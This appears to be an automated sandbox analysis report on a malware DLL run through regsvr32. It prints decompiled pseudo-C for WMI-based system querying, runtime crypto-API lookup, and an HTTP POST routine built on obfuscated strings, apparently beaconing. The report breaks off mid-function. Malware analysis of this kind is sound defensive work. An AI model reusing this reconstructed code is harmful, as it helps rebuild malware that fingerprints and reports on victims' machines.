            0x0317858b
            0x03178590
            0x03178592
            0x03178595
            0x0317859c
            0x031785a2
            0x031785a5
            0x031785a8
            0x031785ab
            0x031785ae
            0x031785b1
            0x031785b7
            0x031785c5
            0x031785cb
            0x031785ce
            0x031785d1
            0x031785d1
            0x031785d4
            0x031785d6
            0x031785d9
            0x031785df
            0x031785e6
            0x031785ec
            0x03178645
            0x03178645
            0x03178648
            0x03178648
            0x0317864e
            0x03178656
            0x03178663
            0x031785ee
            0x031785ee
            0x031785f9
            0x031785fc
            0x031785ff
            0x03178602
            0x03178609
            0x0317860c
            0x0317860f
            0x03178612
            0x03178615
            0x0317861b
            0x03178627
            0x0317862c
            0x03178639
            0x03178639
            0x00000000
            0x031785ec
            0x031783ca
            0x031783cf
            0x031783d5
            0x031783d5
            0x031783dd
            0x031783dd
            0x031783e5
            0x031783e5
            0x031783ed
            0x031783fa
            0x03178403
            0x03178408
            0x0317844d
            0x0317844f
            0x0317840a
            0x0317840a
            0x0317840d
            0x03178410
            0x03178417
            0x0317841a
            0x0317841d
            0x03178420
            0x03178423
            0x03178429
            0x03178437
            0x0317843d
            0x03178446
            0x03178449
            0x03178449
            0x03178452
            0x03178455
            0x0317845b
            0x0317845b
            0x03178462
            0x03178462
            0x03178469
            0x03178469
            0x03178471
            0x03178471
            0x03178478
            0x03178485
            0x0317848e
            0x03178491
            0x03178496
            0x03178498
            0x0317849b
            0x031784a2
            0x031784a8
            0x031784ab
            0x031784ae
            0x031784b1
            0x031784b4
            0x031784b7
            0x031784bd
            0x031784cb
            0x031784d1
            0x031784d4
            0x031784d7
            0x031784d7
            0x031784da
            0x031784dc
            0x031784df
            0x031784e5
            0x031784ec
            0x031784f2
            0x0317854b
            0x0317854b
            0x00000000
            0x031784f4
            0x031784f4
            0x031784ff
            0x03178502
            0x03178505
            0x03178508
            0x0317850f
            0x03178512
            0x03178515
            0x03178518
            0x0317851b
            0x03178521
            0x0317852d
            0x03178532
            0x0317853f
            0x00000000
            0x0317853f
            0x03178314
            0x0317831a
            0x0317831d
            0x03178320
            0x03178320
            0x03178323
            0x03178323
            0x03178329
            0x03178329
            0x03178331
            0x03178336
            0x03178343
            0x0317834c
            0x0317834f
            0x03178354
            0x0317839c
            0x03178356
            0x03178356
            0x03178359
            0x03178360
            0x03178366
            0x03178369
            0x0317836c
            0x0317836f
            0x03178372
            0x03178375
            0x0317837b
            0x03178389
            0x0317838c
            0x0317838f
            0x03178398
            0x03178398
            0x031783a2
            0x031783a8
            0x031783ab
            0x031783b2
            0x031783b2
            0x03178765
            0x03178765
            0x03178768
            0x0317876a
            0x0317876f
            0x0317877e
            0x0317878a
            0x0317878f
            0x0317878f
            0x03178780
            0x03178780
            0x03178785
            0x03178785
            0x03178785
            0x03178771
            0x03178771
            0x03178776
            0x03178776
            0x03178776
            0x00000000
            0x0317876f
            0x0317830e
            0x03178303
            0x03178306
            0x03178794
            0x00000000
            0x03178794
            0x00000000
            0x03178797
            0x03178797
            0x0317879b
            0x0317879b
            0x0317879b
            0x00000000
            0x031782e4

            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
            • Instruction ID: 078c2fae943261a600a85a817b2cbc9d802b6346d5b36d7a1ebb98a9c67f9716
            • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
            • Instruction Fuzzy Hash: 87F160756092218FC709CF18C4D88F67BF5AFA9310B1E82FDD8899B3A6D7319980CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 031763B0 Relevance: .2, Instructions: 190COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 25efd792c6f9a9a632d61f153d75c9f2630d9668a2ca7ffb9a8bc530088649be
            • Instruction ID: c4891fbc35c26fb2f3b0131d9c07e9949a9d8ddc803d0cd224446f8dac01de06
            • Opcode Fuzzy Hash: 25efd792c6f9a9a632d61f153d75c9f2630d9668a2ca7ffb9a8bc530088649be
            • Instruction Fuzzy Hash: EC7158316101A54FDB1CDE1EE8D047973B1E78E30235D451EE986CB389C635E56ADBB0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 031729E9 Relevance: .2, Instructions: 169COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 51b2aec972c6c31ada5728095afd5273e5fb41b106dcebc8ba99730c4c2b993a
            • Instruction ID: 63c7a77fe175552932321a52941f246227d45e477ff28075ff20a66c7b62bac7
            • Opcode Fuzzy Hash: 51b2aec972c6c31ada5728095afd5273e5fb41b106dcebc8ba99730c4c2b993a
            • Instruction Fuzzy Hash: 5A517BB3B041B00BDF68CE3D8C642757ED35AD915170EC2B6F9A9CB24AE978C7059760
            Uniqueness

            Uniqueness Score: -1.00%

            Function 031735EE Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f6131ebf6223bb6e2460bd414e444af3ca40f28b1903113cf83fa3e7fa3a95ed
            • Instruction ID: fa804efa6fac9ded1e0bf40734926c3a994320613830abdeefdac56995693c3f
            • Opcode Fuzzy Hash: f6131ebf6223bb6e2460bd414e444af3ca40f28b1903113cf83fa3e7fa3a95ed
            • Instruction Fuzzy Hash: 7E21413A6154128BD35CDF2CD4A5A69F3A5FB48210F85427ED517CB682CB61E492CBC1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316EACA Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E0316EACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0316E485(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E03168DC9(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E03168DDF( &_v60, 0xfffffffe);
					E0316E539( &_v104);
					return _t320;
				}
				_t165 = E03169F85(_t255, 0xcdd);
				 *_t328 = 0x6b4;
				_v52 = _t165;
				_t166 = E03169F85(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E03169C50(_t165);
				_v60 = _t322;
				E03168D9A( &_v52);
				E03168D9A( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E03169F85(_t255, 0xc93);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E03168D9A( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E03168DDF( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E03169AB3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E03169AB3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E03168E5D(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E03168DC9( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E03168DDF(_t136, 0);
								E03168DDF( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E03169AB3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E03169F85(_t281, 0xcc1);
								 *_t329 = 0xabe;
								_t217 = E03169F85(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E03168DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E03168D9A( &_v92);
											E03168D9A( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E03169FE4();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E03168DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E03169F85(_t283, 0x2a);
										E03169FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E03168D9A( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E03169AB3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0316E9AE( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E03168DDF( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































            0x0316ead3
            0x0316ead9
            0x0316eae0
            0x0316eae3
            0x0316eae6
            0x0316eaeb
            0x0316eaed
            0x0316eaf2
            0x0316ef37
            0x0316ef37
            0x0316eaff
            0x0316eb01
            0x0316eb04
            0x0316eb07
            0x0316ef1c
            0x0316ef22
            0x0316ef2c
            0x00000000
            0x0316ef31
            0x0316eb12
            0x0316eb19
            0x0316eb20
            0x0316eb23
            0x0316eb28
            0x0316eb2a
            0x0316eb2d
            0x0316eb30
            0x0316eb31
            0x0316eb3a
            0x0316eb40
            0x0316eb43
            0x0316eb4c
            0x0316eb51
            0x0316eb56
            0x0316eb6d
            0x0316eb7a
            0x0316eb7d
            0x0316eb84
            0x0316eb89
            0x0316eb90
            0x0316eb95
            0x0316eb9c
            0x0316eb9e
            0x0316ebaa
            0x0316ebad
            0x0316ebaf
            0x0316ef0c
            0x0316ef0d
            0x0316ef16
            0x00000000
            0x0316ef16
            0x0316ebb5
            0x0316ebb8
            0x0316ebbb
            0x0316ebbe
            0x0316ebc0
            0x0316eed8
            0x0316eedb
            0x0316eede
            0x0316eee0
            0x0316ef02
            0x0316ef07
            0x0316eee2
            0x0316eee5
            0x0316eef0
            0x0316eef7
            0x0316eef7
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0316ebc6
            0x0316ebc6
            0x0316ebd8
            0x0316ebdb
            0x0316ebdd
            0x00000000
            0x00000000
            0x0316ebe5
            0x0316ebe8
            0x0316ebeb
            0x0316ebee
            0x0316ebf1
            0x0316ebf4
            0x00000000
            0x00000000
            0x0316ebfa
            0x0316ec08
            0x0316ec0b
            0x0316ec0d
            0x0316ec26
            0x0316ec35
            0x0316ec3d
            0x0316ec3d
            0x0316ec40
            0x0316ec47
            0x0316ec4b
            0x0316ec51
            0x0316ec53
            0x0316eec0
            0x0316eec6
            0x0316eecc
            0x0316eecf
            0x0316eecf
            0x00000000
            0x0316eecf
            0x0316ec62
            0x0316ec76
            0x0316ec7a
            0x0316ec7c
            0x0316ec81
            0x0316ee8d
            0x0316ee93
            0x0316ee9e
            0x0316eea9
            0x0316eeaf
            0x0316eeb5
            0x0316eeb8
            0x00000000
            0x0316eeb8
            0x0316ec87
            0x0316ee5b
            0x0316ee5b
            0x0316ee5e
            0x0316ee61
            0x00000000
            0x00000000
            0x0316ec8f
            0x0316ec97
            0x0316ec9e
            0x0316eca4
            0x0316eca6
            0x00000000
            0x00000000
            0x0316ecaf
            0x0316ecc4
            0x0316ecca
            0x0316ecd3
            0x0316ecd6
            0x0316ecd9
            0x0316ecdb
            0x0316ee4e
            0x0316ee51
            0x0316ee5a
            0x0316ee5a
            0x00000000
            0x0316ee5a
            0x0316eceb
            0x0316ecee
            0x0316ecf5
            0x0316ecfb
            0x0316ecfe
            0x0316ed01
            0x0316ed04
            0x0316ed07
            0x0316ed43
            0x0316ed43
            0x0316ed46
            0x0316edef
            0x0316ee03
            0x0316ee13
            0x0316ee17
            0x0316ee19
            0x0316ee30
            0x0316ee34
            0x0316ee3d
            0x0316ee48
            0x00000000
            0x0316ee48
            0x0316ee1f
            0x0316ee20
            0x0316ee25
            0x0316ee25
            0x0316ee27
            0x0316ee28
            0x0316ee2d
            0x00000000
            0x0316ee2d
            0x0316ed4c
            0x0316ed4c
            0x0316ed4f
            0x0316edb7
            0x0316edcb
            0x0316eddb
            0x0316eddf
            0x0316ede1
            0x00000000
            0x00000000
            0x0316ede7
            0x0316ede8
            0x00000000
            0x0316ede8
            0x0316ed51
            0x0316ed51
            0x0316ed54
            0x00000000
            0x00000000
            0x0316ed56
            0x0316ed59
            0x00000000
            0x00000000
            0x0316ed5b
            0x0316ed5b
            0x0316ed61
            0x0316ed7a
            0x0316ed89
            0x0316ed92
            0x0316ed97
            0x0316ed9a
            0x0316eda0
            0x0316eda0
            0x0316eda5
            0x0316edb1
            0x00000000
            0x0316edb1
            0x0316ed66
            0x00000000
            0x0316ed66
            0x0316ed09
            0x0316ed30
            0x0316ed35
            0x0316ed3a
            0x0316ed3c
            0x0316ed3c
            0x00000000
            0x0316ed3a
            0x0316ed0b
            0x0316ed0b
            0x0316ed0e
            0x00000000
            0x00000000
            0x0316ed14
            0x0316ed14
            0x0316ed17
            0x00000000
            0x00000000
            0x0316ed1d
            0x0316ed1d
            0x0316ed20
            0x00000000
            0x00000000
            0x0316ed26
            0x0316ed29
            0x00000000
            0x00000000
            0x0316ed2b
            0x00000000
            0x0316ed2b
            0x0316ee6a
            0x0316ee70
            0x0316ee76
            0x0316ee79
            0x0316ee7c
            0x0316ee7c
            0x0316ee7f
            0x0316ee80
            0x0316ee83
            0x0316ee85
            0x00000000
            0x00000000
            0x0316eed5
            0x0316eed5
            0x00000000
            0x0316eed5
            0x0316ec0f
            0x0316ec15
            0x00000000
            0x0316ec15
            0x0316eed2
            0x00000000
            0x0316eb58
            0x0316eb5d
            0x0316eb62
            0x00000000
            0x0316eb66

            APIs
              • Part of subcall function 0316E485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E498
              • Part of subcall function 0316E485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4A9
              • Part of subcall function 0316E485: CoCreateInstance.OLE32(0317C8A0,00000000,00000001,0317C8B0,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4C0
              • Part of subcall function 0316E485: SysAllocString.OLEAUT32(00000000), ref: 0316E4CB
              • Part of subcall function 0316E485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4F6
              • Part of subcall function 03168DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03169793,00000100,?,0316661B), ref: 03168DD7
            • SysAllocString.OLEAUT32(00000000), ref: 0316EB73
            • SysAllocString.OLEAUT32(00000000), ref: 0316EB87
            • SysFreeString.OLEAUT32(?), ref: 0316EF0D
            • SysFreeString.OLEAUT32(?), ref: 0316EF16
              • Part of subcall function 03168DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03168E25
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
            • String ID: FALSE$TRUE
            • API String ID: 1290676130-1412513891
            • Opcode ID: 04b57a1773d914d2ef68b9f11dd0399e7cb3c37af4bc7818c964fd233bac4c29
            • Instruction ID: 460615b0513e6618b367175bfcc3ae419dd153317f686d16d066798e20779300
            • Opcode Fuzzy Hash: 04b57a1773d914d2ef68b9f11dd0399e7cb3c37af4bc7818c964fd233bac4c29
            • Instruction Fuzzy Hash: DDE16E7AD00219AFCB14DFE8C984EEEBBB9FF4C300F144559E505AB285DB31A955CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03172951 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 30%
            			E03172951(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E031728AC( &_v16);
				return 0;
			}











            0x03172957
            0x03172969
            0x0317296d
            0x031729e1
            0x00000000
            0x031729e3
            0x0317297d
            0x03172981
            0x00000000
            0x00000000
            0x03172989
            0x0317298b
            0x03172990
            0x00000000
            0x00000000
            0x0317299a
            0x0317299e
            0x00000000
            0x00000000
            0x031729a0
            0x031729a5
            0x031729a7
            0x031729a9
            0x031729ae
            0x031729b3
            0x00000000
            0x00000000
            0x031729be
            0x031729c8
            0x031729cc
            0x00000000
            0x00000000
            0x031729db
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,03167C84), ref: 03172963
            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0317297B
            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 03172989
            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 03172998
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
            • API String ID: 667068680-129414566
            • Opcode ID: 14a3428bd3d267230a13c582782ba0f882427a78e7b004bbc8dba630225d5073
            • Instruction ID: 9328aa4f919217819be480dd26cd60d90099ff44d28663609a88922120b99070
            • Opcode Fuzzy Hash: 14a3428bd3d267230a13c582782ba0f882427a78e7b004bbc8dba630225d5073
            • Instruction Fuzzy Hash: C0118237E44329BBDB11E6B48C42F9EB6BC9F4C651F1D0561EA00E6140DB70DE068664
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316F7A3 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 268COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0316F7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				void* _t166;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_t166 = 0x65;
				_v56 = E03169F6B(_t166);
				_v52 = E03169F6B(0xcc6);
				_v48 = E03169F6B(0xe03);
				_v44 = E03169F6B(0x64c);
				_t94 = E03169F6B(0x80a);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E03168F63( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E0316A5D0(_t190));
				_t102 =  *0x317f8f0; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x317f8f0; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x317f9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E0316F73B(_t189);
							_t110 =  *0x317f8f0; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E0316A1F8(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x317f8f0; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E0316A1F8(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E0316F6E9(_t116);
									}
									_t117 = E03169F6B(0x82e);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x317f8f0; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0316A5D0(_t193), _a4, _a8);
									E03168D87( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E0316A1F8(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E03168F63( &_v20, 0, _t122);
										_t127 =  *0x317f8f0; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
